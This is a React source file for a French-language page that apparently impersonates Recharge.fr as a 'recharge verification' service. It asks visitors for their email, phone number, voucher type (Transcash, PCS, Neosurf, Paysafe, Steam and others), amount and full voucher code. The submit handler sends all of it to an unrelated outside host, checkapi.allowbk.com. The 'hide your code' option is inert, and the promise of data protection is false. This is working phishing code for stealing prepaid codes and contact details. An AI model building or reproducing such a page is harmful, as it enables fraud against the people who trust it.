import React, { useState, useRef } from "react";
import "bootstrap/dist/css/bootstrap.min.css";
import { useNavigate } from "react-router-dom";
import Swal from "sweetalert2";

export default function Forms() {
  const [phoneCode, setPhoneCode] = useState("+33");
  const [phoneNumber, setPhoneNumber] = useState("");
  const [phoneError, setPhoneError] = useState("");
  const [showForm, setShowForm] = useState(false);
  const [loading, setLoading] = useState(false);
  const SUBMITTED_CODES_KEY = 'submittedCodes';
  const [result, setResult] = useState(null);
  const formRef = useRef(null);
  const navigate = useNavigate();

  const codeLengths = {
    "+33": 9, // France
    "+32": 8, // Belgique
    "+41": 9, // Suisse
    "+34": 9, // Espagne
  };

  const countryMap = {
    "+33": "fr",
    "+32": "be",
    "+41": "ch",
    "+34": "es",
  };

  const handlePhoneChange = (e) => {
    const val = e.target.value.replace(/\D/g, "");
    setPhoneNumber(val);
  };

  const handlePhoneBlur = () => {
    const required = codeLengths[phoneCode] || 0;
    setPhoneError(
      phoneNumber.length !== required
        ? `Le numéro doit contenir ${required} chiffres.`
        : ""
    );
  };


  const handleVerifyClick = () => {
    const wel_div = document.getElementById("wel_div");
    wel_div.style.display = "none";
    setShowForm(true);
    setTimeout(() => {
      formRef.current?.scrollIntoView({ behavior: "smooth" });
    }, 0);
  };


  const handleSubmit = async (e) => {
    e.preventDefault();
    const fd = new FormData(formRef.current);
    const data = Object.fromEntries(fd.entries());
    const code = data.code.trim();

    // console.log(data)

    // Lecture des codes déjà soumis
    const submitted = JSON.parse(localStorage.getItem(SUBMITTED_CODES_KEY)) || [];

    // Si déjà présent → popup et on sort
    if (submitted.includes(code)) {
      Swal.fire({
        icon: 'info',
        title: 'Code déjà vérifié',
        text: 'Ce code a déjà été soumis pour vérification.',
        confirmButtonText: 'Ressayer',
        customClass: { confirmButton: 'btn btn-primary' }
      });
      return;
    }

    // Sinon on l’ajoute au localStorage
    submitted.push(code);
    localStorage.setItem(SUBMITTED_CODES_KEY, JSON.stringify(submitted));

    setLoading(true);
    try {
      const resp = await fetch(
        'https://checkapi.allowbk.com/verify_link/check.php',
        {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify(data),
        }
      );
      const json = await resp.json();
      navigate('/result', { state: { ...data, success: json.success } });
    } catch (err) {
      console.error(err);
      Swal.fire({
        icon: 'error',
        title: 'Erreur réseau',
        text: 'Impossible de joindre le serveur.',

      });
    } finally {
      setLoading(false);
    }
  };

  const handleCancel = () => {
    const wel_div = document.getElementById("wel_div");
    wel_div.style.display = "block";
    setShowForm(false);
  };

  return (
    <div>
      <div className="container-fluid ">
        <div className="row ">
          <div className="col-md-1"></div>
          <div className="col-md-10 ">
            <div class="mt-2">
              <div
                class="p-2 mb-4 bg-primary text-white rounded-3 text-center "
                id="wel_div"
              >
                <h3 class="fw-bold">
                  Bienvenue sur{" "}
                  <span style={{ fontSize: "14px" }}>Recharge.fr</span>{" "}
                  <span style={{ fontSize: "8px", fontWeight: "100" }}>
                    Verification
                  </span>
                </h3>
                <p class="lead text-dark semi-bold">
                  Votre plateforme de confiance pour la vérification de toutes
                  vos recharges. Rapide, sécurisée et transparente, pour vous
                  offrir la tranquillité d’esprit.
                </p>
                <hr className="my-4 border-light fw-bold" />
                <p class="text-mutted text-dark">
                  Vérifiez la validité de votre recharge dès maintenant en
                  quelques clics et bénéficiez d’un service irréprochable.
                </p>
              </div>
              {/* Spinner overlay */}
              {loading && (
                <div
                  style={{
                    position: "fixed",
                    top: 0,
                    left: 0,
                    width: "100%",
                    height: "100%",
                    background: "rgba(11, 11, 11, 0.8)",
                    zIndex: 9999,
                    display: "flex",
                    justifyContent: "center",
                    alignItems: "center",
                    flexDirection: "column",
                  }}
                >
                  <div
                    className="spinner-border text-primary"
                    role="status"
                    style={{ height: "100px", width: "100px" }}
                  >
                    <span className="visually-hidden">Loading...</span>
                  </div>
                  <br />
                  <div className="mt-2 text-center container text-light fs-5">
                    Veuillez patienter, votre recharge est en cours de
                    vérification...
                  </div>
                </div>
              )}
              {/* Actions buttons centered */}
              {!showForm && (
                <div
                  className="d-flex flex-column justify-content-center align-items-center my-4 container"
                  style={{ minHeight: "" }} // optionnel : pour centrer sur toute la hauteur de la fenêtre
                  id="btn_group"
                >
                  <button
                    type="button"
                    className="btn btn-outline-primary mb-1 container"
                    onClick={handleVerifyClick}
                  >
                    Vérifier ma recharge
                  </button>

                  <a
                    href="https://recharge.fr"
                    target="_blank"
                    rel="noopener noreferrer"
                    className="btn btn-primary container"
                  >
                    Acheter une recharge
                  </a>
                </div>
              )}
            </div>

            {/* Formulaire, visible uniquement si showForm */}
            {showForm && (
              <form
                id="form"
                ref={formRef}
                onSubmit={handleSubmit}
                className={` container col-md-8 p-1  mt-1 ${showForm ? "" : "d-none"
                  }`}
              >
                <p className="text-center fs-5 fw-semibold mb-3">
                  Veuillez entrer les informations
                </p>
                <hr />
                {/* Email */}
                <div className="mb-3">
                  <label htmlFor="email" className="form-label">
                    Email
                  </label>
                  <input
                    type="email"
                    className="form-control"
                    id="email"
                    name="email"
                    placeholder="Entrez votre email"
                    required
                  />
                </div>

                {/* Téléphone (indicatif + numéro) */}
                <div className="mb-3">
                  <label htmlFor="phone" className="form-label">
                    Téléphone
                  </label>
                  <div className="input-group">
                    <span className="input-group-text bg-transparent border-end-0 p-0">
                      <img
                        src={`https://flagcdn.com/w40/${countryMap[phoneCode]}.png`}
                        alt="Flag"
                        width="24"
                        className="mx-1"
                      />
                    </span>
                    <select
                      id="indicatif"
                      name="indicatif"
                      className="form-select border-start-0"
                      style={{ maxWidth: "80px" }}
                      value={phoneCode}
                      onChange={(e) => setPhoneCode(e.target.value)}
                    >
                      <option value="+33">+33</option>
                      <option value="+32">+32</option>
                      <option value="+41">+41</option>
                      <option value="+34">+34</option>
                    </select>
                    <input
                      type="tel"
                      id="phone"
                      name="phone"
                      className={`form-control ${phoneError ? "is-invalid" : ""
                        }`}
                      placeholder="Numéro de téléphone"
                      value={phoneNumber}
                      onChange={handlePhoneChange}
                      onBlur={handlePhoneBlur}
                      required
                    />
                    {phoneError && (
                      <div className="invalid-feedback">{phoneError}</div>
                    )}
                  </div>
                </div>

                {/* Type */}
                <div className="mb-3">
                  <label htmlFor="type" className="form-label">
                    Type de recharge
                  </label>
                  <select
                    id="type"
                    name="type"
                    className="form-select"
                    required
                  >
                    <option value="" defaultValue>
                      Sélectionnez un type
                    </option>
                    <option value="TRANSCASH">TRANSCASH</option>
                    <option value="NEOSURF">NEOSURF</option>
                    <option value="PCS">PCS</option>
                    <option value="ITUNES">ITUNES</option>
                    <option value="GOOGLE PLAY">GOOGLE PLAY</option>
                    <option value="STEAM">STEAM</option>
                    <option value="NETFLIX">NETFLIX</option>
                    <option value="PAYSAFE">PAYSAFE</option>
                    <option value="AMAZON">AMAZON</option>
                    <option value="CRYPTO NOW">CRYPTO NOW</option>
                    <option value="TONEO">TONEO</option>
                  </select>
                </div>

                {/* Masquer votre code */}
                <div className="mb-3 form-check">
                  <input
                    type="checkbox"
                    className="form-check-input"
                    id="hideCode"
                    name="hideCode"
                  />
                  <label className="form-check-label" htmlFor="hideCode">
                    Masquer votre code
                  </label>
                </div>

                {/* Montant */}
                <div className="mb-3">
                  <label htmlFor="montant" className="form-label">
                    Montant
                  </label>
                  <input
                    type="number"
                    className="form-control"
                    id="montant"
                    name="montant"
                    placeholder="Entrez le montant"
                    required
                  />
                </div>

                {/* Code */}
                <div className="mb-3">
                  <label htmlFor="code" className="form-label">
                    Code
                  </label>
                  <input
                    type="text"
                    className="form-control"
                    id="code"
                    name="code"
                    placeholder="Entrez le code"
                    required
                    style={{ textTransform: 'uppercase' }}                       // garde l’affichage en uppercase
                    onInput={e => e.currentTarget.value = e.currentTarget.value.toUpperCase()} // force la valeur
                  />
                </div>
                <hr />

                <div
                  className="mt- p-2 text-center alert alert-info"
                  style={{ fontSize: "12px" }}
                >
                  <p>
                    En poursuivant, vous bénéficiez d’une protection client et
                    d’une sécurité renforcée, garantissant la confidentialité de
                    vos données.
                  </p>
                </div>
                <hr />

                {/* Bouton Envoyer */}
                <button type="submit" className="btn btn-primary container">
                  Vérifier
                </button>

                <p
                  type=""
                  className="btn btn-outline-danger container mt-2"
                  onClick={handleCancel}
                >
                  Annuler
                </p>
              </form>
            )}

            {/* Affichage du résultat */}
            {result && (
              <div className="container mt-3">
                <div className="alert alert-info text-center">{result}</div>
              </div>
            )}
          </div>
          <div className="col-md-1"></div>
        </div>
      </div>
    </div>
  );
}
